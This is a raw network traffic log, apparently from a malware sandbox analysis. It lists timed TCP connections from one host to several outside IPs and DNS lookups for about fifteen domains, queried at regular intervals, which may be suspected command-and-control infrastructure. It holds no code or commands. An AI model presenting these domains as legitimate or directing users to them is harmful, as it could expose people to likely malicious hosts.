                                                                                              Oct 8, 2024 05:30:21.600888968 CEST5003980192.168.2.468.65.122.222
                                                                                              Oct 8, 2024 05:30:21.605884075 CEST805003968.65.122.222192.168.2.4
                                                                                              Oct 8, 2024 05:30:21.609098911 CEST5003980192.168.2.468.65.122.222
                                                                                              Oct 8, 2024 05:30:21.620862007 CEST5003980192.168.2.468.65.122.222
                                                                                              Oct 8, 2024 05:30:21.625761032 CEST805003968.65.122.222192.168.2.4
                                                                                              Oct 8, 2024 05:30:22.208457947 CEST805003968.65.122.222192.168.2.4
                                                                                              Oct 8, 2024 05:30:22.208472967 CEST805003968.65.122.222192.168.2.4
                                                                                              Oct 8, 2024 05:30:22.208493948 CEST805003968.65.122.222192.168.2.4
                                                                                              Oct 8, 2024 05:30:22.208503008 CEST805003968.65.122.222192.168.2.4
                                                                                              Oct 8, 2024 05:30:22.208523035 CEST805003968.65.122.222192.168.2.4
                                                                                              Oct 8, 2024 05:30:22.208534002 CEST5003980192.168.2.468.65.122.222
                                                                                              Oct 8, 2024 05:30:22.208538055 CEST805003968.65.122.222192.168.2.4
                                                                                              Oct 8, 2024 05:30:22.208534002 CEST5003980192.168.2.468.65.122.222
                                                                                              Oct 8, 2024 05:30:22.208583117 CEST5003980192.168.2.468.65.122.222
                                                                                              Oct 8, 2024 05:30:23.127819061 CEST5003980192.168.2.468.65.122.222
                                                                                              Oct 8, 2024 05:30:24.147437096 CEST5004080192.168.2.468.65.122.222
                                                                                              Oct 8, 2024 05:30:24.153552055 CEST805004068.65.122.222192.168.2.4
                                                                                              Oct 8, 2024 05:30:24.159864902 CEST5004080192.168.2.468.65.122.222
                                                                                              Oct 8, 2024 05:30:24.167464018 CEST5004080192.168.2.468.65.122.222
                                                                                              Oct 8, 2024 05:30:24.172454119 CEST805004068.65.122.222192.168.2.4
                                                                                              Oct 8, 2024 05:30:24.172467947 CEST805004068.65.122.222192.168.2.4
                                                                                              Oct 8, 2024 05:30:24.172492027 CEST805004068.65.122.222192.168.2.4
                                                                                              Oct 8, 2024 05:30:24.172504902 CEST805004068.65.122.222192.168.2.4
                                                                                              Oct 8, 2024 05:30:24.172518015 CEST805004068.65.122.222192.168.2.4
                                                                                              Oct 8, 2024 05:30:24.172527075 CEST805004068.65.122.222192.168.2.4
                                                                                              Oct 8, 2024 05:30:24.173208952 CEST805004068.65.122.222192.168.2.4
                                                                                              Oct 8, 2024 05:30:24.173229933 CEST805004068.65.122.222192.168.2.4
                                                                                              Oct 8, 2024 05:30:24.173240900 CEST805004068.65.122.222192.168.2.4
                                                                                              Oct 8, 2024 05:30:24.869760990 CEST805004068.65.122.222192.168.2.4
                                                                                              Oct 8, 2024 05:30:24.869800091 CEST805004068.65.122.222192.168.2.4
                                                                                              Oct 8, 2024 05:30:24.869808912 CEST805004068.65.122.222192.168.2.4
                                                                                              Oct 8, 2024 05:30:24.869971991 CEST5004080192.168.2.468.65.122.222
                                                                                              Oct 8, 2024 05:30:24.870023012 CEST805004068.65.122.222192.168.2.4
                                                                                              Oct 8, 2024 05:30:24.870033979 CEST805004068.65.122.222192.168.2.4
                                                                                              Oct 8, 2024 05:30:24.870049953 CEST805004068.65.122.222192.168.2.4
                                                                                              Oct 8, 2024 05:30:24.870057106 CEST805004068.65.122.222192.168.2.4
                                                                                              Oct 8, 2024 05:30:24.870070934 CEST5004080192.168.2.468.65.122.222
                                                                                              Oct 8, 2024 05:30:24.870115042 CEST5004080192.168.2.468.65.122.222
                                                                                              Oct 8, 2024 05:30:25.676876068 CEST5004080192.168.2.468.65.122.222
                                                                                              Oct 8, 2024 05:30:26.692970037 CEST5004180192.168.2.468.65.122.222
                                                                                              Oct 8, 2024 05:30:26.697961092 CEST805004168.65.122.222192.168.2.4
                                                                                              Oct 8, 2024 05:30:26.698034048 CEST5004180192.168.2.468.65.122.222
                                                                                              Oct 8, 2024 05:30:26.704163074 CEST5004180192.168.2.468.65.122.222
                                                                                              Oct 8, 2024 05:30:26.709080935 CEST805004168.65.122.222192.168.2.4
                                                                                              Oct 8, 2024 05:30:27.301913023 CEST805004168.65.122.222192.168.2.4
                                                                                              Oct 8, 2024 05:30:27.301929951 CEST805004168.65.122.222192.168.2.4
                                                                                              Oct 8, 2024 05:30:27.301945925 CEST805004168.65.122.222192.168.2.4
                                                                                              Oct 8, 2024 05:30:27.301954031 CEST805004168.65.122.222192.168.2.4
                                                                                              Oct 8, 2024 05:30:27.301981926 CEST805004168.65.122.222192.168.2.4
                                                                                              Oct 8, 2024 05:30:27.301990986 CEST805004168.65.122.222192.168.2.4
                                                                                              Oct 8, 2024 05:30:27.302007914 CEST805004168.65.122.222192.168.2.4
                                                                                              Oct 8, 2024 05:30:27.302022934 CEST805004168.65.122.222192.168.2.4
                                                                                              Oct 8, 2024 05:30:27.302107096 CEST805004168.65.122.222192.168.2.4
                                                                                              Oct 8, 2024 05:30:27.302118063 CEST805004168.65.122.222192.168.2.4
                                                                                              Oct 8, 2024 05:30:27.302161932 CEST5004180192.168.2.468.65.122.222
                                                                                              Oct 8, 2024 05:30:27.302161932 CEST5004180192.168.2.468.65.122.222
                                                                                              Oct 8, 2024 05:30:27.302232981 CEST5004180192.168.2.468.65.122.222
                                                                                              Oct 8, 2024 05:30:27.306911945 CEST5004180192.168.2.468.65.122.222
                                                                                              Oct 8, 2024 05:30:27.311721087 CEST805004168.65.122.222192.168.2.4
                                                                                              Oct 8, 2024 05:30:32.382390976 CEST5004280192.168.2.435.214.185.243
                                                                                              Oct 8, 2024 05:30:32.387320042 CEST805004235.214.185.243192.168.2.4
                                                                                              Oct 8, 2024 05:30:32.387404919 CEST5004280192.168.2.435.214.185.243
                                                                                              Oct 8, 2024 05:30:32.400733948 CEST5004280192.168.2.435.214.185.243
                                                                                              Oct 8, 2024 05:30:32.405566931 CEST805004235.214.185.243192.168.2.4
                                                                                              Oct 8, 2024 05:30:33.776416063 CEST805004235.214.185.243192.168.2.4
                                                                                              Oct 8, 2024 05:30:33.776448011 CEST805004235.214.185.243192.168.2.4
                                                                                              Oct 8, 2024 05:30:33.776458025 CEST805004235.214.185.243192.168.2.4
                                                                                              Oct 8, 2024 05:30:33.776473045 CEST805004235.214.185.243192.168.2.4
                                                                                              Oct 8, 2024 05:30:33.776489973 CEST805004235.214.185.243192.168.2.4
                                                                                              Oct 8, 2024 05:30:33.776498079 CEST805004235.214.185.243192.168.2.4
                                                                                              Oct 8, 2024 05:30:33.776505947 CEST805004235.214.185.243192.168.2.4
                                                                                              Oct 8, 2024 05:30:33.776521921 CEST805004235.214.185.243192.168.2.4
                                                                                              Oct 8, 2024 05:30:33.776542902 CEST805004235.214.185.243192.168.2.4
                                                                                              Oct 8, 2024 05:30:33.776554108 CEST805004235.214.185.243192.168.2.4
                                                                                              Oct 8, 2024 05:30:33.776573896 CEST5004280192.168.2.435.214.185.243
                                                                                              Oct 8, 2024 05:30:33.776575089 CEST5004280192.168.2.435.214.185.243
                                                                                              Oct 8, 2024 05:30:33.776603937 CEST805004235.214.185.243192.168.2.4
                                                                                              Oct 8, 2024 05:30:33.776613951 CEST805004235.214.185.243192.168.2.4
                                                                                              Oct 8, 2024 05:30:33.776660919 CEST5004280192.168.2.435.214.185.243
                                                                                              Oct 8, 2024 05:30:33.778856993 CEST5004280192.168.2.435.214.185.243
                                                                                              Oct 8, 2024 05:30:33.780059099 CEST805004235.214.185.243192.168.2.4
                                                                                              Oct 8, 2024 05:30:33.781389952 CEST805004235.214.185.243192.168.2.4
                                                                                              Oct 8, 2024 05:30:33.781440020 CEST5004280192.168.2.435.214.185.243
                                                                                              Oct 8, 2024 05:30:33.782140970 CEST5004280192.168.2.435.214.185.243
                                                                                              Oct 8, 2024 05:30:33.782140970 CEST5004280192.168.2.435.214.185.243
                                                                                              Oct 8, 2024 05:30:33.910867929 CEST5004280192.168.2.435.214.185.243
                                                                                              Oct 8, 2024 05:30:34.927840948 CEST5004380192.168.2.435.214.185.243
                                                                                              Oct 8, 2024 05:30:35.302809000 CEST805004335.214.185.243192.168.2.4
                                                                                              Oct 8, 2024 05:30:35.310826063 CEST5004380192.168.2.435.214.185.243
                                                                                              Oct 8, 2024 05:30:35.319402933 CEST5004380192.168.2.435.214.185.243
                                                                                              Oct 8, 2024 05:30:35.324415922 CEST805004335.214.185.243192.168.2.4
                                                                                              Oct 8, 2024 05:30:36.030699968 CEST805004335.214.185.243192.168.2.4
                                                                                              Oct 8, 2024 05:30:36.030709982 CEST805004335.214.185.243192.168.2.4
                                                                                              Oct 8, 2024 05:30:36.030714989 CEST805004335.214.185.243192.168.2.4
                                                                                              Oct 8, 2024 05:30:36.030728102 CEST805004335.214.185.243192.168.2.4
                                                                                              Oct 8, 2024 05:30:36.030735016 CEST805004335.214.185.243192.168.2.4
                                                                                              Oct 8, 2024 05:30:36.030760050 CEST805004335.214.185.243192.168.2.4
                                                                                              Oct 8, 2024 05:30:36.030765057 CEST805004335.214.185.243192.168.2.4
                                                                                              Oct 8, 2024 05:30:36.030766964 CEST805004335.214.185.243192.168.2.4
                                                                                              Oct 8, 2024 05:30:36.030819893 CEST5004380192.168.2.435.214.185.243
                                                                                              Oct 8, 2024 05:30:36.030867100 CEST5004380192.168.2.435.214.185.243
                                                                                              Oct 8, 2024 05:30:36.031197071 CEST805004335.214.185.243192.168.2.4
                                                                                              Oct 8, 2024 05:30:36.031199932 CEST805004335.214.185.243192.168.2.4
                                                                                              Oct 8, 2024 05:30:36.031208038 CEST805004335.214.185.243192.168.2.4
                                                                                              Oct 8, 2024 05:30:36.031436920 CEST5004380192.168.2.435.214.185.243
                                                                                              Oct 8, 2024 05:30:36.815284014 CEST5004380192.168.2.435.214.185.243
                                                                                              Oct 8, 2024 05:30:37.834851980 CEST5004480192.168.2.435.214.185.243
                                                                                              Oct 8, 2024 05:30:37.839869022 CEST805004435.214.185.243192.168.2.4
                                                                                              Oct 8, 2024 05:30:37.843808889 CEST5004480192.168.2.435.214.185.243
                                                                                              Oct 8, 2024 05:30:37.850187063 CEST5004480192.168.2.435.214.185.243
                                                                                              Oct 8, 2024 05:30:37.855139971 CEST805004435.214.185.243192.168.2.4
                                                                                              Oct 8, 2024 05:30:37.855143070 CEST805004435.214.185.243192.168.2.4
                                                                                              Oct 8, 2024 05:30:37.855145931 CEST805004435.214.185.243192.168.2.4
                                                                                              Oct 8, 2024 05:30:37.855154037 CEST805004435.214.185.243192.168.2.4
                                                                                              Oct 8, 2024 05:30:37.855330944 CEST805004435.214.185.243192.168.2.4
                                                                                              Oct 8, 2024 05:30:37.855334044 CEST805004435.214.185.243192.168.2.4
                                                                                              Oct 8, 2024 05:30:37.855338097 CEST805004435.214.185.243192.168.2.4
                                                                                              Oct 8, 2024 05:30:37.855345011 CEST805004435.214.185.243192.168.2.4
                                                                                              Oct 8, 2024 05:30:37.855348110 CEST805004435.214.185.243192.168.2.4
                                                                                              Oct 8, 2024 05:30:38.683845997 CEST805004435.214.185.243192.168.2.4
                                                                                              Oct 8, 2024 05:30:38.683861971 CEST805004435.214.185.243192.168.2.4
                                                                                              Oct 8, 2024 05:30:38.683881998 CEST805004435.214.185.243192.168.2.4
                                                                                              Oct 8, 2024 05:30:38.683891058 CEST805004435.214.185.243192.168.2.4
                                                                                              Oct 8, 2024 05:30:38.683918953 CEST805004435.214.185.243192.168.2.4
                                                                                              Oct 8, 2024 05:30:38.683928967 CEST805004435.214.185.243192.168.2.4
                                                                                              Oct 8, 2024 05:30:38.683924913 CEST5004480192.168.2.435.214.185.243
                                                                                              Oct 8, 2024 05:30:38.683944941 CEST805004435.214.185.243192.168.2.4
                                                                                              Oct 8, 2024 05:30:38.683959007 CEST805004435.214.185.243192.168.2.4
                                                                                              Oct 8, 2024 05:30:38.683959961 CEST5004480192.168.2.435.214.185.243
                                                                                              Oct 8, 2024 05:30:38.683978081 CEST805004435.214.185.243192.168.2.4
                                                                                              Oct 8, 2024 05:30:38.683985949 CEST5004480192.168.2.435.214.185.243
                                                                                              Oct 8, 2024 05:30:38.683988094 CEST805004435.214.185.243192.168.2.4
                                                                                              Oct 8, 2024 05:30:38.684001923 CEST5004480192.168.2.435.214.185.243
                                                                                              Oct 8, 2024 05:30:38.684031010 CEST5004480192.168.2.435.214.185.243
                                                                                              Oct 8, 2024 05:30:38.684031963 CEST805004435.214.185.243192.168.2.4
                                                                                              Oct 8, 2024 05:30:38.684072971 CEST5004480192.168.2.435.214.185.243
                                                                                              Oct 8, 2024 05:30:39.362216949 CEST5004480192.168.2.435.214.185.243
                                                                                              Oct 8, 2024 05:30:40.381100893 CEST5004580192.168.2.435.214.185.243
                                                                                              Oct 8, 2024 05:30:40.386084080 CEST805004535.214.185.243192.168.2.4
                                                                                              Oct 8, 2024 05:30:40.386167049 CEST5004580192.168.2.435.214.185.243
                                                                                              Oct 8, 2024 05:30:40.394764900 CEST5004580192.168.2.435.214.185.243
                                                                                              Oct 8, 2024 05:30:40.399662971 CEST805004535.214.185.243192.168.2.4
                                                                                              Oct 8, 2024 05:30:41.074350119 CEST805004535.214.185.243192.168.2.4
                                                                                              Oct 8, 2024 05:30:41.074513912 CEST805004535.214.185.243192.168.2.4
                                                                                              Oct 8, 2024 05:30:41.074683905 CEST5004580192.168.2.435.214.185.243
                                                                                              Oct 8, 2024 05:30:41.077994108 CEST5004580192.168.2.435.214.185.243
                                                                                              Oct 8, 2024 05:30:41.083045006 CEST805004535.214.185.243192.168.2.4
                                                                                              Oct 8, 2024 05:30:46.145601988 CEST5004680192.168.2.484.32.84.32
                                                                                              Oct 8, 2024 05:30:46.151582003 CEST805004684.32.84.32192.168.2.4
                                                                                              Oct 8, 2024 05:30:46.158785105 CEST5004680192.168.2.484.32.84.32
                                                                                              Oct 8, 2024 05:30:46.164839983 CEST5004680192.168.2.484.32.84.32
                                                                                              Oct 8, 2024 05:30:46.169878006 CEST805004684.32.84.32192.168.2.4
                                                                                              Oct 8, 2024 05:30:46.619021893 CEST805004684.32.84.32192.168.2.4
                                                                                              Oct 8, 2024 05:30:46.619071007 CEST5004680192.168.2.484.32.84.32
                                                                                              Oct 8, 2024 05:30:47.675790071 CEST5004680192.168.2.484.32.84.32
                                                                                              Oct 8, 2024 05:30:47.987807989 CEST5004680192.168.2.484.32.84.32
                                                                                              Oct 8, 2024 05:30:48.448751926 CEST805004684.32.84.32192.168.2.4
                                                                                              Oct 8, 2024 05:30:48.448769093 CEST805004684.32.84.32192.168.2.4
                                                                                              Oct 8, 2024 05:30:48.448821068 CEST5004680192.168.2.484.32.84.32
                                                                                              Oct 8, 2024 05:30:48.693648100 CEST5004780192.168.2.484.32.84.32
                                                                                              Oct 8, 2024 05:30:48.699569941 CEST805004784.32.84.32192.168.2.4
                                                                                              Oct 8, 2024 05:30:48.699656010 CEST5004780192.168.2.484.32.84.32
                                                                                              Oct 8, 2024 05:30:48.712783098 CEST5004780192.168.2.484.32.84.32
                                                                                              Oct 8, 2024 05:30:48.717780113 CEST805004784.32.84.32192.168.2.4
                                                                                              Oct 8, 2024 05:30:49.303188086 CEST805004784.32.84.32192.168.2.4
                                                                                              Oct 8, 2024 05:30:49.311100006 CEST5004780192.168.2.484.32.84.32
                                                                                              Oct 8, 2024 05:30:49.485840082 CEST805004784.32.84.32192.168.2.4
                                                                                              Oct 8, 2024 05:30:49.492192030 CEST5004780192.168.2.484.32.84.32
                                                                                              Oct 8, 2024 05:30:50.241575956 CEST5004780192.168.2.484.32.84.32
                                                                                              Oct 8, 2024 05:30:50.246598959 CEST805004784.32.84.32192.168.2.4
                                                                                              Oct 8, 2024 05:30:51.256958008 CEST5004880192.168.2.484.32.84.32
                                                                                              Oct 8, 2024 05:30:51.262263060 CEST805004884.32.84.32192.168.2.4
                                                                                              Oct 8, 2024 05:30:51.268866062 CEST5004880192.168.2.484.32.84.32
                                                                                              Oct 8, 2024 05:30:51.276160955 CEST5004880192.168.2.484.32.84.32
                                                                                              Oct 8, 2024 05:30:51.281368017 CEST805004884.32.84.32192.168.2.4
                                                                                              Oct 8, 2024 05:30:51.281373024 CEST805004884.32.84.32192.168.2.4
                                                                                              Oct 8, 2024 05:30:51.281382084 CEST805004884.32.84.32192.168.2.4
                                                                                              Oct 8, 2024 05:30:51.281385899 CEST805004884.32.84.32192.168.2.4
                                                                                              Oct 8, 2024 05:30:51.281398058 CEST805004884.32.84.32192.168.2.4
                                                                                              Oct 8, 2024 05:30:51.281559944 CEST805004884.32.84.32192.168.2.4
                                                                                              Oct 8, 2024 05:30:51.281567097 CEST805004884.32.84.32192.168.2.4
                                                                                              Oct 8, 2024 05:30:51.281605959 CEST805004884.32.84.32192.168.2.4
                                                                                              Oct 8, 2024 05:30:51.281610012 CEST805004884.32.84.32192.168.2.4
                                                                                              Oct 8, 2024 05:30:51.745814085 CEST805004884.32.84.32192.168.2.4
                                                                                              Oct 8, 2024 05:30:51.747009993 CEST5004880192.168.2.484.32.84.32
                                                                                              Oct 8, 2024 05:30:52.784024954 CEST5004880192.168.2.484.32.84.32
                                                                                              Oct 8, 2024 05:30:52.788980007 CEST805004884.32.84.32192.168.2.4
                                                                                              Oct 8, 2024 05:30:53.803410053 CEST5004980192.168.2.484.32.84.32
                                                                                              Oct 8, 2024 05:30:53.808355093 CEST805004984.32.84.32192.168.2.4
                                                                                              Oct 8, 2024 05:30:53.813190937 CEST5004980192.168.2.484.32.84.32
                                                                                              Oct 8, 2024 05:30:53.816461086 CEST5004980192.168.2.484.32.84.32
                                                                                              Oct 8, 2024 05:30:53.821583033 CEST805004984.32.84.32192.168.2.4
                                                                                              Oct 8, 2024 05:30:54.511497974 CEST805004984.32.84.32192.168.2.4
                                                                                              Oct 8, 2024 05:30:54.511516094 CEST805004984.32.84.32192.168.2.4
                                                                                              Oct 8, 2024 05:30:54.511538029 CEST805004984.32.84.32192.168.2.4
                                                                                              Oct 8, 2024 05:30:54.511547089 CEST805004984.32.84.32192.168.2.4
                                                                                              Oct 8, 2024 05:30:54.511590004 CEST805004984.32.84.32192.168.2.4
                                                                                              Oct 8, 2024 05:30:54.511603117 CEST805004984.32.84.32192.168.2.4
                                                                                              Oct 8, 2024 05:30:54.511620045 CEST805004984.32.84.32192.168.2.4
                                                                                              Oct 8, 2024 05:30:54.511629105 CEST805004984.32.84.32192.168.2.4
                                                                                              Oct 8, 2024 05:30:54.511646986 CEST805004984.32.84.32192.168.2.4
                                                                                              Oct 8, 2024 05:30:54.511652946 CEST5004980192.168.2.484.32.84.32
                                                                                              Oct 8, 2024 05:30:54.511657953 CEST805004984.32.84.32192.168.2.4
                                                                                              Oct 8, 2024 05:30:54.511672020 CEST5004980192.168.2.484.32.84.32
                                                                                              Oct 8, 2024 05:30:54.511672974 CEST805004984.32.84.32192.168.2.4
                                                                                              Oct 8, 2024 05:30:54.511703968 CEST5004980192.168.2.484.32.84.32
                                                                                              Oct 8, 2024 05:30:54.511715889 CEST5004980192.168.2.484.32.84.32
                                                                                              Oct 8, 2024 05:30:54.516031027 CEST5004980192.168.2.484.32.84.32
                                                                                              Oct 8, 2024 05:30:54.523859024 CEST805004984.32.84.32192.168.2.4
                                                                                              Oct 8, 2024 05:30:59.695453882 CEST5005080192.168.2.43.33.130.190
                                                                                              Oct 8, 2024 05:30:59.700368881 CEST80500503.33.130.190192.168.2.4
                                                                                              Oct 8, 2024 05:30:59.700874090 CEST5005080192.168.2.43.33.130.190
                                                                                              Oct 8, 2024 05:30:59.710211039 CEST5005080192.168.2.43.33.130.190
                                                                                              Oct 8, 2024 05:30:59.715039015 CEST80500503.33.130.190192.168.2.4
                                                                                              Oct 8, 2024 05:31:00.170941114 CEST80500503.33.130.190192.168.2.4
                                                                                              Oct 8, 2024 05:31:00.176940918 CEST5005080192.168.2.43.33.130.190
                                                                                              Oct 8, 2024 05:31:01.222213030 CEST5005080192.168.2.43.33.130.190
                                                                                              Oct 8, 2024 05:31:01.227174997 CEST80500503.33.130.190192.168.2.4
                                                                                              Oct 8, 2024 05:31:02.239319086 CEST5005180192.168.2.43.33.130.190
                                                                                              Oct 8, 2024 05:31:02.729091883 CEST80500513.33.130.190192.168.2.4
                                                                                              Oct 8, 2024 05:31:02.729311943 CEST5005180192.168.2.43.33.130.190
                                                                                              Oct 8, 2024 05:31:02.740233898 CEST5005180192.168.2.43.33.130.190
                                                                                              Oct 8, 2024 05:31:02.745049000 CEST80500513.33.130.190192.168.2.4
                                                                                              Oct 8, 2024 05:31:03.306866884 CEST80500513.33.130.190192.168.2.4
                                                                                              Oct 8, 2024 05:31:03.308888912 CEST5005180192.168.2.43.33.130.190
                                                                                              Oct 8, 2024 05:31:04.252825022 CEST5005180192.168.2.43.33.130.190
                                                                                              Oct 8, 2024 05:31:04.257760048 CEST80500513.33.130.190192.168.2.4
                                                                                              Oct 8, 2024 05:31:05.272969007 CEST5005280192.168.2.43.33.130.190
                                                                                              Oct 8, 2024 05:31:05.278028965 CEST80500523.33.130.190192.168.2.4
                                                                                              Oct 8, 2024 05:31:05.284732103 CEST5005280192.168.2.43.33.130.190
                                                                                              Oct 8, 2024 05:31:05.292769909 CEST5005280192.168.2.43.33.130.190
                                                                                              Oct 8, 2024 05:31:05.297816992 CEST80500523.33.130.190192.168.2.4
                                                                                              Oct 8, 2024 05:31:05.297822952 CEST80500523.33.130.190192.168.2.4
                                                                                              Oct 8, 2024 05:31:05.297835112 CEST80500523.33.130.190192.168.2.4
                                                                                              Oct 8, 2024 05:31:05.297842979 CEST80500523.33.130.190192.168.2.4
                                                                                              Oct 8, 2024 05:31:05.297884941 CEST80500523.33.130.190192.168.2.4
                                                                                              Oct 8, 2024 05:31:05.297888041 CEST80500523.33.130.190192.168.2.4
                                                                                              Oct 8, 2024 05:31:05.297890902 CEST80500523.33.130.190192.168.2.4
                                                                                              Oct 8, 2024 05:31:05.297938108 CEST80500523.33.130.190192.168.2.4
                                                                                              Oct 8, 2024 05:31:05.297940969 CEST80500523.33.130.190192.168.2.4
                                                                                              Oct 8, 2024 05:31:05.788486958 CEST80500523.33.130.190192.168.2.4
                                                                                              Oct 8, 2024 05:31:05.788840055 CEST5005280192.168.2.43.33.130.190
                                                                                              Oct 8, 2024 05:31:06.799679995 CEST5005280192.168.2.43.33.130.190
                                                                                              Oct 8, 2024 05:31:06.804774046 CEST80500523.33.130.190192.168.2.4
                                                                                              Oct 8, 2024 05:31:07.819474936 CEST5005380192.168.2.43.33.130.190
                                                                                              Oct 8, 2024 05:31:07.824759960 CEST80500533.33.130.190192.168.2.4
                                                                                              Oct 8, 2024 05:31:07.828774929 CEST5005380192.168.2.43.33.130.190
                                                                                              Oct 8, 2024 05:31:07.835439920 CEST5005380192.168.2.43.33.130.190
                                                                                              Oct 8, 2024 05:31:07.840404987 CEST80500533.33.130.190192.168.2.4
                                                                                              Oct 8, 2024 05:31:08.351483107 CEST80500533.33.130.190192.168.2.4
                                                                                              Oct 8, 2024 05:31:08.351505041 CEST80500533.33.130.190192.168.2.4
                                                                                              Oct 8, 2024 05:31:08.351778030 CEST5005380192.168.2.43.33.130.190
                                                                                              Oct 8, 2024 05:31:08.354398966 CEST5005380192.168.2.43.33.130.190
                                                                                              Oct 8, 2024 05:31:08.359270096 CEST80500533.33.130.190192.168.2.4
                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                              Oct 8, 2024 05:28:05.890130997 CEST5415853192.168.2.41.1.1.1
                                                                                              Oct 8, 2024 05:28:06.154375076 CEST53541581.1.1.1192.168.2.4
                                                                                              Oct 8, 2024 05:28:22.093811035 CEST5830653192.168.2.41.1.1.1
                                                                                              Oct 8, 2024 05:28:22.111641884 CEST53583061.1.1.1192.168.2.4
                                                                                              Oct 8, 2024 05:28:35.724960089 CEST5937453192.168.2.41.1.1.1
                                                                                              Oct 8, 2024 05:28:35.990701914 CEST53593741.1.1.1192.168.2.4
                                                                                              Oct 8, 2024 05:28:49.758168936 CEST5135053192.168.2.41.1.1.1
                                                                                              Oct 8, 2024 05:28:49.790638924 CEST53513501.1.1.1192.168.2.4
                                                                                              Oct 8, 2024 05:29:03.100572109 CEST5761453192.168.2.41.1.1.1
                                                                                              Oct 8, 2024 05:29:03.161566973 CEST53576141.1.1.1192.168.2.4
                                                                                              Oct 8, 2024 05:29:16.382602930 CEST5071953192.168.2.41.1.1.1
                                                                                              Oct 8, 2024 05:29:16.402770996 CEST53507191.1.1.1192.168.2.4
                                                                                              Oct 8, 2024 05:29:29.741108894 CEST5440253192.168.2.41.1.1.1
                                                                                              Oct 8, 2024 05:29:29.753278017 CEST53544021.1.1.1192.168.2.4
                                                                                              Oct 8, 2024 05:29:43.197911978 CEST5199653192.168.2.41.1.1.1
                                                                                              Oct 8, 2024 05:29:43.214252949 CEST53519961.1.1.1192.168.2.4
                                                                                              Oct 8, 2024 05:29:51.271401882 CEST6193253192.168.2.41.1.1.1
                                                                                              Oct 8, 2024 05:29:51.363524914 CEST53619321.1.1.1192.168.2.4
                                                                                              Oct 8, 2024 05:30:04.725507975 CEST5476353192.168.2.41.1.1.1
                                                                                              Oct 8, 2024 05:30:05.486008883 CEST53547631.1.1.1192.168.2.4
                                                                                              Oct 8, 2024 05:30:19.052670956 CEST4986553192.168.2.41.1.1.1
                                                                                              Oct 8, 2024 05:30:19.064917088 CEST53498651.1.1.1192.168.2.4
                                                                                              Oct 8, 2024 05:30:32.318953037 CEST5643153192.168.2.41.1.1.1
                                                                                              Oct 8, 2024 05:30:32.378387928 CEST53564311.1.1.1192.168.2.4
                                                                                              Oct 8, 2024 05:30:46.086790085 CEST5319453192.168.2.41.1.1.1
                                                                                              Oct 8, 2024 05:30:46.140024900 CEST53531941.1.1.1192.168.2.4
                                                                                              Oct 8, 2024 05:30:59.523435116 CEST6036153192.168.2.41.1.1.1
                                                                                              Oct 8, 2024 05:30:59.690165043 CEST53603611.1.1.1192.168.2.4
                                                                                              Oct 8, 2024 05:31:13.755764008 CEST6211753192.168.2.41.1.1.1
                                                                                              Oct 8, 2024 05:31:13.798588991 CEST53621171.1.1.1192.168.2.4
                                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                              Oct 8, 2024 05:28:05.890130997 CEST192.168.2.41.1.1.10x5ffdStandard query (0)www.sailforever.xyzA (IP address)IN (0x0001)false
                                                                                              Oct 8, 2024 05:28:22.093811035 CEST192.168.2.41.1.1.10xee96Standard query (0)www.my1pgz.proA (IP address)IN (0x0001)false
                                                                                              Oct 8, 2024 05:28:35.724960089 CEST192.168.2.41.1.1.10x5cffStandard query (0)www.dealsbyaustin.onlineA (IP address)IN (0x0001)false
                                                                                              Oct 8, 2024 05:28:49.758168936 CEST192.168.2.41.1.1.10x42ddStandard query (0)www.portfolioalex.netA (IP address)IN (0x0001)false
                                                                                              Oct 8, 2024 05:29:03.100572109 CEST192.168.2.41.1.1.10xf64aStandard query (0)www.luxurylive.xyzA (IP address)IN (0x0001)false
                                                                                              Oct 8, 2024 05:29:16.382602930 CEST192.168.2.41.1.1.10xc6b8Standard query (0)www.hellosmall.infoA (IP address)IN (0x0001)false
                                                                                              Oct 8, 2024 05:29:29.741108894 CEST192.168.2.41.1.1.10xb31eStandard query (0)www.hcpf.xyzA (IP address)IN (0x0001)false
                                                                                              Oct 8, 2024 05:29:43.197911978 CEST192.168.2.41.1.1.10x7b03Standard query (0)www.sharilyn.orgA (IP address)IN (0x0001)false
                                                                                              Oct 8, 2024 05:29:51.271401882 CEST192.168.2.41.1.1.10x97fcStandard query (0)www.majorconcept.xyzA (IP address)IN (0x0001)false
                                                                                              Oct 8, 2024 05:30:04.725507975 CEST192.168.2.41.1.1.10x2e47Standard query (0)www.32456.xyzA (IP address)IN (0x0001)false
                                                                                              Oct 8, 2024 05:30:19.052670956 CEST192.168.2.41.1.1.10x509dStandard query (0)www.osi.gardenA (IP address)IN (0x0001)false
                                                                                              Oct 8, 2024 05:30:32.318953037 CEST192.168.2.41.1.1.10x3bc4Standard query (0)www.aed.shoppingA (IP address)IN (0x0001)false
                                                                                              Oct 8, 2024 05:30:46.086790085 CEST192.168.2.41.1.1.10xec07Standard query (0)www.pinkpantys.shopA (IP address)IN (0x0001)false
                                                                                              Oct 8, 2024 05:30:59.523435116 CEST192.168.2.41.1.1.10xe959Standard query (0)www.sdfhfgoool10.lifeA (IP address)IN (0x0001)false
                                                                                              Oct 8, 2024 05:31:13.755764008 CEST192.168.2.41.1.1.10xfc29Standard query (0)www.concept.pinkA (IP address)IN (0x0001)false
                                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                              Oct 8, 2024 05:28:06.154375076 CEST1.1.1.1192.168.2.40x5ffdNo error (0)www.sailforever.xyz103.106.67.112A (IP address)IN (0x0001)false
                                                                                              Oct 8, 2024 05:28:22.111641884 CEST1.1.1.1192.168.2.40xee96No error (0)www.my1pgz.pro156.227.17.86A (IP address)IN (0x0001)false
                                                                                              Oct 8, 2024 05:28:35.990701914 CEST1.1.1.1192.168.2.40x5cffNo error (0)www.dealsbyaustin.online208.91.197.27A (IP address)IN (0x0001)false
                                                                                              Oct 8, 2024 05:28:49.790638924 CEST1.1.1.1192.168.2.40x42ddNo error (0)www.portfolioalex.nethome.portfolioboxdns.comCNAME (Canonical name)IN (0x0001)false
                                                                                              Oct 8, 2024 05:28:49.790638924 CEST1.1.1.1192.168.2.40x42ddNo error (0)home.portfolioboxdns.com34.251.91.168A (IP address)IN (0x0001)false
                                                                                              Oct 8, 2024 05:28:49.790638924 CEST1.1.1.1192.168.2.40x42ddNo error (0)home.portfolioboxdns.com52.214.224.110A (IP address)IN (0x0001)false
                                                                                              Oct 8, 2024 05:28:49.790638924 CEST1.1.1.1192.168.2.40x42ddNo error (0)home.portfolioboxdns.com52.213.55.157A (IP address)IN (0x0001)false
